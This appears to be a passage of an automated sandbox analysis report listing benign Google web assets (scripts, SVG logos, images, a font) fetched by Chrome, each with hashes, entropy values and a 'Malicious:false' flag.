                                                                                                                                                                                                                                                                                          Preview:import{r as p,s as v,x as l}from"./ycaG4YXp.min.js";import{e as b}from"./0XPwTFcg.min.js";import{n as d}from"./IYoTYjYE.min.js";import{o as m}from"./5Ss99t85.min.js";const f=".container{width:9px;height:9px;border-radius:9px;--base-color: #3c4043;transition:box-shadow .2s ease-in-out}.container--active{border:1px solid var(--base-color);background:var(--base-color)}.container--inactive{border:1px solid var(--base-color);background:transparent}";var u=Object.defineProperty,x=Object.getOwnPropertyDescriptor,c=(s,e,a,o)=>{for(var r=o>1?void 0:o?x(e,a):e,i=s.length-1,n;i>=0;i--)(n=s[i])&&(r=(o?n(e,a,r):n(r))||r);return o&&r&&u(e,a,r),r};let t=class extends v{render(){return l`<div. class=${m({container:!0,"container--active":!!this.active,"container--inactive":!this.active})}. ></div>`}};t.styles=p(f);c([d({type:Boolean})],t.prototype,"active",2);t=c([b("bds-pagination-item")],t);.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x394, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):53732
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.976623625234184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:AA9o4z/XA2o+0GMl8iaKQd+F+//irY6rTpM4VwY+QyeNT2/gtka4/wHhqtarlOwK:QfplD+dMY6RM40neNEG4//tIWAG
                                                                                                                                                                                                                                                                                          MD5:ECA846A72F792ACC118807786418A959
                                                                                                                                                                                                                                                                                          SHA1:0B3CD58BA0CD9C5C0C5B0F1BE35C81EADB3F8B17
                                                                                                                                                                                                                                                                                          SHA-256:0E6F88FE0ABDD1B89C9B7FAE440008E0757FCA908F1237D1D74E951CCF7EDC4E
                                                                                                                                                                                                                                                                                          SHA-512:C4436B31B7D819E1AAEB4E87E9FE387B92C20DF427876CD60930E678FC13F65BA02A24B30D14B0C0568A2872FDD1EFD098BD34BD54D4DBADD68CF0E263ECA839
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF...........................................................................................................................................................".........................................H.........................!.1.."AQa.#2q...B.R......3b..$Cr...Sc..s....4.........................................................!1A.."Qa.2.Bq.#.................?.....Z.)K.W.8B^]{..^.B.yu....cmB..U...e.qP..+.i|V.j.C....-jV..v.1J..H.CJ...+..hc...qZ.P.R...^JL....Z.qZb......+.vA3.jb..\T..u...+.j....4t.ex....u..8".V.c...aN...5...X.N<...P.p.....YX*.i.l....g...B..l.B..b.A..[y4..m...l!..t...D...(.+p+...0W5Fx.....6.{U.3aMrG.O....n!O..A..XpW$s...C.....D..iD...C=?.,{y.^.c.R. <.v.$.H.B...^.........B......f..7..n..5{..A......M...n..{x...Q.m.@E..\p>q\.q.\......".......q.z\.A..l..M. e.fX..',O....r..1.=.!YZ.&.gF1H..!.:..89e....@..jR.D,)Lu.%..u.2...CS.iQJ..O.T.]0..b..F..}d......;~......1.q@...#l..F........e.EI;..'...|...r....2..A.~..g...f8.;V.wN.h.5..M...<{!G2s.+#...e.r.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1560
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.088043317491995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:CLK/ksGxPgkUfgDL8uflIrLNMhG8Q8sYcl4:Ur1FUfgDAufr/Q8s7l4
                                                                                                                                                                                                                                                                                          MD5:0FAAFDF5BBDECD4D8899F0FCCE45DCE1
                                                                                                                                                                                                                                                                                          SHA1:10AA1A950CC3078427495C10A0F7F15A1B5DD227
                                                                                                                                                                                                                                                                                          SHA-256:1E1D28E3ABB9C8259BB70B96490441AE862AA40D352663BA2542EC1AD49F2D58
                                                                                                                                                                                                                                                                                          SHA-512:47E7B60E128FAD56CFD1FE1534E59B33B58C24374A8079E71848DD322937F7C769FE4F48455718B28FC8B8784CECBE5FDE3DC9F4F31C2D166AE1FFEB27E7C5B2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 84 28" width="84" height="28">. <path d="M11.06 20.38c-5.42 0-9.98-4.42-9.98-9.84S5.64.7 11.06.7c3 0 5.14 1.18 6.75 2.71l-1.9 1.9c-1.15-1.08-2.71-1.92-4.85-1.92C7.1 3.39 4 6.58 4 10.54c0 3.96 3.1 7.15 7.06 7.15 2.57 0 4.03-1.03 4.97-1.97.77-.77 1.27-1.87 1.46-3.38h-6.43V9.66h9.05c.1.48.14 1.06.14 1.68 0 2.02-.55 4.51-2.33 6.29-1.73 1.79-3.93 2.75-6.86 2.75zm23.18-6.33c0 3.65-2.8 6.34-6.24 6.34s-6.25-2.69-6.25-6.34c0-3.67 2.8-6.34 6.25-6.34s6.24 2.67 6.24 6.34zm-2.73 0c0-2.28-1.63-3.84-3.51-3.84s-3.51 1.56-3.51 3.84c0 2.26 1.63 3.84 3.51 3.84s3.51-1.59 3.51-3.84zm16.73 0c0 3.65-2.8 6.34-6.25 6.34-3.44 0-6.24-2.69-6.24-6.34 0-3.67 2.8-6.34 6.24-6.34 3.45 0 6.25 2.67 6.25 6.34zm-2.73 0c0-2.28-1.63-3.84-3.51-3.84s-3.51 1.56-3.51 3.84c0 2.26 1.63 3.84 3.51 3.84 1.89 0 3.51-1.59 3.51-3.84zM61.9 8.09v11.38c0 4.68-2.76 6.6-6.02 6.6-3.07 0-4.92-2.06-5.62-3.74l2.42-1.01c.43 1.03 1.49 2.26 3.19 2.26 2.09 0 3.38-1.3 3.38-3.72v-.91h-.1c-.62.77
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (1575)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1576
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.237031381029663
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:+lJyMLDxBEJj7lrq70uKnmAfhnldFhZyFRRcUymtIV87VfVopIqyzjWFEj8bE:jMZBSq70hnmAJthCLyW889q2+Ej8bE
                                                                                                                                                                                                                                                                                          MD5:B2FBFE121EBB31210C9F5A9823BA1F0C
                                                                                                                                                                                                                                                                                          SHA1:40EFB691CB62F552EC3357AF3AE4113D54411BC3
                                                                                                                                                                                                                                                                                          SHA-256:A302CD15D9075C3BD242F46A33BD8F5E72F07D669076C8972BA3D1E03125A3D3
                                                                                                                                                                                                                                                                                          SHA-512:B07315A1ADFF21FEC8382F34CCA7B5F8E3F2B0631488653A589CD872A867F21E94637AF38A3A0EAB27239134A24D7B06FAC7F47203AABA25F41686D74065F2BA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/vjYgswK-.min.js
                                                                                                                                                                                                                                                                                          Preview:import{s as l}from"./ycaG4YXp.min.js";import{e as f}from"./0XPwTFcg.min.js";function h(n){let e=window.location.search.split(n+"=")[1];return e=e&&e.split("&")[0],e||null}function d(n){const e=n.substr(1),r={};return e.split("&").forEach(a=>{const t=a.split("=");t[0]!==""&&(r[t[0]]=decodeURIComponent(t[1]))}),r}function u(n,e){Object.entries(n).forEach(([r,a])=>{e(r,a)})}var m=Object.defineProperty,w=Object.getOwnPropertyDescriptor,b=(n,e,r,a)=>{for(var t=a>1?void 0:a?w(e,r):e,o=n.length-1,s;o>=0;o--)(s=n[o])&&(t=(a?s(e,r,t):s(t))||t);return a&&t&&m(e,r,t),t};let p=class extends l{connectedCallback(){super.connectedCallback();const e=h("version")==="2"?"approach-feature-cards":"approach-5050",r=document.getElementById(e);r&&(r.style.display="none")}async firstUpdated(){await this.updateComplete,this.preserveParams()}preserveParams(){const n=Array.from(document.querySelectorAll("a[href],hsw-button[href]")).filter(e=>e.getAttribute("href").startsWith("/"));this.appendUrlParamsToLinks(n,[
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (13382)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):193722
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.884032674456666
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:q4BJ6DbSdIX+FZPrIa53rbZIbBAUtN+Tk/jXal:q4BJ6DedHFZzIa53r9IbHql
                                                                                                                                                                                                                                                                                          MD5:3DC5B1BBFBB16D91C649A2996C19EA20
                                                                                                                                                                                                                                                                                          SHA1:A12E173230A43453A5D362CCA1672016AC5ABB6D
                                                                                                                                                                                                                                                                                          SHA-256:BE1AD1976BA20E603980C7F8C7C60971784854D76B5630A2C6CA2D13F4E77BDB
                                                                                                                                                                                                                                                                                          SHA-512:C7F64BB45A6562C441D9753C2E30333A6EA6D8F3B4AA055E8CB3D5AA56D3EA772CC8DE9390DF25F6A41512954ACF702BDFEA3D6888836C2E19F4E89CC9660528
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/imghp?hl=en&ogbl
                                                                                                                                                                                                                                                                                          Preview:<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="Google Images. The most comprehensive image search on the web." name="description"><meta content="Anm+hhtuh7NJguqSnXHEAIqqMaV+GXCks8WYXHJKF7l6AeYMj+wO+fi9OdDqFnJTg9t0492DykVxx4jpvFbxnA8AAABseyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IlByaXZhY3lTYW5kYm94QWRzQVBJcyIsImV4cGlyeSI6MTY5NTE2Nzk5OSwiaXNTdWJkb21haW4iOnRydWV9" http-equiv="origin-trial"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google Images</title><script nonce="b08Ts8OXDxtzCRTz_ClpGw">window._hst=Date.now();performance&&performance.mark&&performance.mark("SearchHeadStart");</script><script nonce="b08Ts8OXDxtzCRTz_ClpGw">(function(){var _g={kEI:'ZsT2ZqHlKMKoxc8Pxv2gkAQ',kEXPI:'0,793344,1711225,795541,22,13189,10673,6203,32624,3799,1561,68,873,232,410,80,179,330269,657,432,3,336830,8926,314,1526
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2063
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.964412336499399
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:mafGsGbHiPDYDec0NQWALAHQOYRiQzTT6Kyz8cllwAzHI+ZIZM+:moGX+OVeBQjGNlnXCz
                                                                                                                                                                                                                                                                                          MD5:FF1DD21B89A09A8BBEDCF9742486FF42
                                                                                                                                                                                                                                                                                          SHA1:49D27816D2122B0935B743691ADCE588AC0E5BCE
                                                                                                                                                                                                                                                                                          SHA-256:EF4CB9F95C00F238C345926A1095C963DAD6A324C92AD752611C1744480F2023
                                                                                                                                                                                                                                                                                          SHA-512:CCF03A2E10D06E742B87E6F5F35B7877D0A45D72305C18DDF4D03A70875BDF5619CFD50F2D2CA2845B66C163E64712DDB54E4CE055EDAD51A399E151B44BF0B9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/97/41/4911d47b463ca63cbff9d8f4a82b/earth-24dp.svg
                                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" enable-background="new 0 0 192 192" height="24px" viewBox="0 0 192 192" width="24px"><rect fill="none" height="192" width="192"/><g><path d="M68.69,114.33c-30-39.69-60.8-9.53-52.76,18.21C29.74,162.89,60.56,184,95.97,184 c31.4,0,58.55-16.37,73.97-40.2C146.74,165.51,104.63,161.88,68.69,114.33z" fill="#255FDB"/><path d="M95.51,87C54.25,24.42,8,57.77,8,96.02c0,13.12,2.86,25.5,7.99,36.68C10.51,106.79,40.28,86.81,68,124 c40.25,54,79.75,44.5,101.85,19.93c5.97-8.9,11.79-22.55,13.42-36.12l-0.03,0.17C173.78,137.4,131.9,142.19,95.51,87z" fill="#4285F4"/><path d="M123.79,59C93.15,8.45,54.3,13,28.03,40.09C15.54,55.28,8,74.75,8,96c2.75-37.04,47.5-62.75,88,0 c36.05,55.85,80.85,41.3,87.23,12.12l0.04-0.28c0.64-4.01,0.71-7.84,0.71-11.96c0-1.33,0.05-2.65-0.01-3.96 C168.35,103,147.85,98.69,123.79,59z" fill="#91BFFF"/><path d="M124,68c28.06,45.11,52.25,33.57,59.97,23.92c-0.3-6.88-1.42-13.54-3.22-19.91 c-13.08,0.27-16.13-1.91-28.95-21.51C132.08,20.35,107.3,0.02,64.04,
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 293, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):197432
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9857281551829375
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:ANSaPN7tAwi8BO9AGlMY12BiY/XV4uwSETVPIzQCEIhi3mvOHDpHFgdfOH9vL5ev:ANSE+tD9zUV4ZSmeQCO1HDd+wHqqvfbU
                                                                                                                                                                                                                                                                                          MD5:D479535F40F9F7AECB4E39AC39049108
                                                                                                                                                                                                                                                                                          SHA1:B97FC1E7115D213BE3889AC617C90DFB1FBB08A5
                                                                                                                                                                                                                                                                                          SHA-256:812AAB68108C223257DA83C7FE54B7FBEEA9C7FD78E60158FD1A2167E9BAC1E7
                                                                                                                                                                                                                                                                                          SHA-512:D810C13FC2D455F86F0D490754D6A26EDDC9B0A3E037DBFEA93C2734668ED2A34A471A83AF5C0BFA6D8363F7D163B7CB74EAE43233DE8B0E748026FD344EF3DA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/pWVbkjhtPTNZbVieBwoW5yp4_edEFybVMNXXAQdphReN5SvSsx3AS-0ssRnBRGbi9mFm9uTIxgrOEY0GdZLldlzaVSlJI8yprmEWEh2gnp1WCQdeMMoF?=w1440
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......%............pHYs.................IDATx...Y...&..b.....KF..VuWw.4.!_f82.?3?y.....nw-.y3c;...03U..5....U]M..y..8`0.}..j............*. . "..B@DB$C$B .D..f$"h/3..,*EsQ50PF.....C...~......!.!...iV.*..S>...i*........on...v.r...@C..xh.].. ."....I..............-# "Z=...m6......._...3.".m>Yn........-._o...<..2lE.h.^.m.`......w.].].1.1......Y....J.?K.5*h...hh.af_L>..."......'.|..x;......o...v.[i."D..G...O~oB....]...... ....l..z....v..o..6.......f...!m.C3S.e...........GD..w?\...;U...|<..?.......}..w.7....v.{d.G...g.... E.)=..~..4..{..:0.2M......w?.....t....d.Yf.....~.B.\..Ni:.Oc. ........p.?\..$.4=...|.t.._}.}{...........D....W..|..j7...#.b...O...!..&!`....H.`h..............@.H.....`.b.e..@...E.(....h.).A..@......................X/HU.......D@]..l..z...fu. .?.U.l%..^..zQ..M.X.-..CX.^V.. m.pq........]...P..... .b]..F...o_.....:.r..\\....?0..Of..$.3.......2....W.CB...@..]..."......6....K.A+.....H..v..Epq.F..a..u8.<.i.....U.yBZ
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 249924, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):249924
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.998616182829746
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:6144:VqSwpbpf/4vDl5TVhRX2SgllT2UfB+D9YKtBP5qiY0erYI:0VF6x1VhR6llKUpg9YKAiY0jI
                                                                                                                                                                                                                                                                                          MD5:2C022A6FD5E18E7F0ABF87FDC591562C
                                                                                                                                                                                                                                                                                          SHA1:25A0D7971FCD016AFDE786DD5CC3F415443A03F9
                                                                                                                                                                                                                                                                                          SHA-256:9C179C67CA8067DF06CBE05B21FC5B4974367B3BB655DAEC9822162E93629277
                                                                                                                                                                                                                                                                                          SHA-512:D3F350AB44E97A4B39EDC1398319EFE16E373D514F0F384FE30E80AF7209FC14CD4DB026BAD82ABBF16ED48627869588D8ABF92358127E86694788356961EA51
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiMUvaYr.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2.......D.......P..............................=...D..x?HVAR.K.`?STAT..'..../<.....|..`..@.0..p.6.$..|. ..B..^..[....F....3.{..s.^.wmo.zRz...&A.b...@ h..1Q.#./y..ET..../.B..w.....;M........U..U....p.................................?L..|.....c.s....?M..>2|@...@......8'h...T.....D....iR..j.6M..$.....x...!x........NkYNE.f...5z...H...p.].!...x.4...&.)...13.|.A...1.b.5..EZj..'.YN3Z.:...p.I.4t....Z3&...8..5.....+...3.p..n...UK.W.......F-...i.m......!8u.;xe.......%..>D....'.ri.]7...p........g~?50V... &.l...j....J0.w.....Q]Ca.:...)/...-....8.U.#Pjd.-B...[}...x6..V.h.:Vw...1D.B.a.p[i...Ta......r.}..d.v{Z.)MQ..!.....JQ/t........ej.w{..t.A..B.J.@8x..=3&.t....\......cUK)..;.U..*.|z...6h..+...8~`.7..4Xt:O..h..O-wS%J.....Eny..{4.....;.S.".>G1.v.{....y.:...m...h ..T.Jv/.8..L.#8..d....>.L.>_...zQ>.K.G......k....?.....i.L.8....4.........i.b,.b..|=<..SK.zD..E...[.....@/..E%....a.....1&.#.M..:..$'.......S4.03...z.H.K......=..:F...@a_...S.Yax...W.h..D.H.>: ..i.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2287)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):215771
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.527442138518943
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:DJ+6L9F/dcVoIqz3DxXEzmnBBBpELq/N6p/kn6Z4vBk7SzCCdwDGslfjiCCc4DRH:9+6L9F/dYoIqz3DxXJnBBBpELq/N6p/Y
                                                                                                                                                                                                                                                                                          MD5:2C5632581BAA068AF863120FAB3D9754
                                                                                                                                                                                                                                                                                          SHA1:810725251933CC8B8F221B2A9CB53B8880673CB3
                                                                                                                                                                                                                                                                                          SHA-256:A54C42C7516DB8E00412BDAB6DD5201FC040960A60DB5030AE6E3CD1B1DD3829
                                                                                                                                                                                                                                                                                          SHA-512:2C517C18982E145EE1670DF6C2F8E13525E2913633340D14C5168E85950E8724A3D7D6C46085A49CF6ACBDA85538E60C08155738944E4CF1B966FED4C6513A40
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{.var Le;Le=0;_.Me=function(a){return Object.prototype.hasOwnProperty.call(a,_.Qb)&&a[_.Qb]||(a[_.Qb]=++Le)};_.Ne=function(a){return _.Pb(a)&&a.nodeType==1};_.Oe=function(a,b){if("textContent"in a)a.textContent=b;else if(a.nodeType==3)a.data=String(b);else if(a.firstChild&&a.firstChild.nodeType==3){for(;a.lastChild!=a.firstChild;)a.removeChild(a.lastChild);a.firstChild.data=String(b)}else _.Ie(a),a.appendChild(_.xe(a).createTextNode(String(b)))};var Pe;_.Qe=function(a,b,c){Array.isArray(c)&&(c=c.join(" "));var d="aria-"+b;c===""||c==void 0?(Pe||(Pe={atomic:!1,autocomplete:"none",dropeffect:"none",haspopup:!1,live:"off",multiline:!1,multiselectable:!1,orientation:"vertical",readonly:!1,relevant:"additions text",required:!1,sort:"none",busy:!1,disabled:!1,hidden:!1,invalid:"false"}),c=Pe,b in c?a.setAttribute(d,c[b]):a.removeAttribute(d)):a.setAttribute(d,c)};var Ue;_.Te=function(a,b,c,d,e,f){if(_.uc&&e)return _.Re(a);if(e&&!d)re
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (17276)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):18500
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.288803063564337
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:CEKmt3JtBOgr3CSEVbMtClyCJ4qelm2JDX6r:jv395bO+t7e4qEJDM
                                                                                                                                                                                                                                                                                          MD5:955ABE8CF2E241745BEE38B92BEBC76C
                                                                                                                                                                                                                                                                                          SHA1:414B13E1866A94EAEF2643A5167381BBE2AA7699
                                                                                                                                                                                                                                                                                          SHA-256:09756F2D963931CD3831E019D7DFC7A71DC6EC0E02ED4CF6232C46E3B40A9909
                                                                                                                                                                                                                                                                                          SHA-512:0A8289AE94A67E9262ADBE1198E622B78B01F031713A0C808854EE91A3C2101E3003C61586A7D4B05D5666531B8B5A51DCC8BB53AF5D29FD34C36C17BFEBED51
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:/** @license ScrollMagic v2.0.6 | (c) 2018 Jan Paepke (@janpaepke) | license & info: http://scrollmagic.io. *. * Copyright (c) 2018 Jan Paepke. *. * Permission is hereby granted, free of charge, to any person obtaining a copy. * of this software and associated documentation files (the "Software"), to deal. * in the Software without restriction, including without limitation the rights. * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. * copies of the Software, and to permit persons to whom the Software is. * furnished to do so, subject to the following conditions:. *. * The above copyright notice and this permission notice shall be included in. * all copies or substantial portions of the Software.. *. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. * AUTHORS OR COPYRIGHT HOLDERS
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):6518
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.94447563884122
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:ZuYRI/I8blV/47cyAsUKlvWvUvV5Vx9V03toP+KkM3yej:ZFV8xVC5AWlp7Vxz03+WKfyej
                                                                                                                                                                                                                                                                                          MD5:A7EDE04C002101CF1C448888E0553446
                                                                                                                                                                                                                                                                                          SHA1:69FA0155412054C44051B54F9B8AEE8CACF94DDB
                                                                                                                                                                                                                                                                                          SHA-256:377882BFF6C62DE6A0C2797516127771D7F5765FC5846A2D3E8BC7822EF74EC1
                                                                                                                                                                                                                                                                                          SHA-512:8FBD5EA17BF15999D55406E0177A2813D102578053A62FF58BCD9B359010A5B4AA0127854D71E783537C93A8342BD5FF7C929F8C67438D8520576559E220CB77
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFFn...WEBPVP8Lb.../..?.. ......Kl.no..$I9.....N.3.+..$!..........Xk..7.1...u....6...a.e.e.e.%.,.,...j........;.....J.d.J.@..D.D.B8.... .W+s>.......B;.N=D1...N... .W....-..!..v5.>-.T....n.#........;.6.hQt....9..a0.......zq.{7.~..U.6.CZ...N&.X..=...5.{'..9+h.[#$.}1-....S.-...a4..^.k.96V.p%..S!.gY.$.....&....hk..;H...S..E....v.$QY...tK.z...Z....!.=.]...\..HcL.....2.mcU.+..~.V.i..:.......H..T... ..(...G".Q%$...'NF..[.I./.>......pJ.^..`.B%....9V.l..TH};y..s......Z.E.@p..J6pw.r...z.Or/..K....r.>..g.]...)z.....>.SN....9..k-.+.|-..6.OG..sT......Y%.+..b.....h_..9............hX.w......3./.....!j.N..:t.?.`E..tU.M@I.7vO...}'1m..7$....qK\.V..=..+..P_..GZc'\F.w....!1..Xl.uU.K.{9...7.l.}^...w...$&.B.r^.p.:K.../.y...nPb].?...h.h.V..J..O...4...>.Zge...q._H....i.:.:'r.dM.*.D.m...|e...A.F..1..[X...{...V.LB1PI..R.A.!..*:@..iW...|..d~egU..N...R....J.i-..4.n....j..P.@jm>:%]...)1....`.".z...jh....'q.U.g6..c.....*)....dg..-.J)...StU.n...y..WO.y.;(...%..^
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1719
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4003431597789415
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:9/S90MU5IahYdmMqPLmumqrYX3DyZ/jTq98:920MUSahYdmM5qrYHw/jmi
                                                                                                                                                                                                                                                                                          MD5:7E4968170175907C71DC14EC4841ACAB
                                                                                                                                                                                                                                                                                          SHA1:C9010640A0CC81506E9721E69E0A508ECFBEAA0A
                                                                                                                                                                                                                                                                                          SHA-256:D7CE0FF7DA59E9040AC54917098C68952C6B4B849ABFF732908008E20E8DF18B
                                                                                                                                                                                                                                                                                          SHA-512:A709A66A26B7BAB6511131B89396AE88AF1BD0B8E16B72447B8FEEF3A8D4663670752D3207650456580130111B5D797B3B59E0C739F9CE6BD4D1D5F34C926E9D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://about.google/assets-products/img/glue-google-color-logo.svg
                                                                                                                                                                                                                                                                                          Preview:<svg id="google-color-logo" width="74" height="24" viewBox="0 0 74 24" xmlns="http://www.w3.org/2000/svg"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"></path><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"></path><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (520)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1621
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.133062707136759
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:BWtHJL4xqZM7aHwh7BrUPVgrhNVbVPO3A66AWKd4YRPdN2xy6Q1NyDoto:BuGp7awh7S9gJhx3afVks6CgD
                                                                                                                                                                                                                                                                                          MD5:E53921C9E7B68E2A9574BEDE4FE9DF64
                                                                                                                                                                                                                                                                                          SHA1:EE4D5BA53B17AB6F31D0DA4F24FF43EBBB91A28A
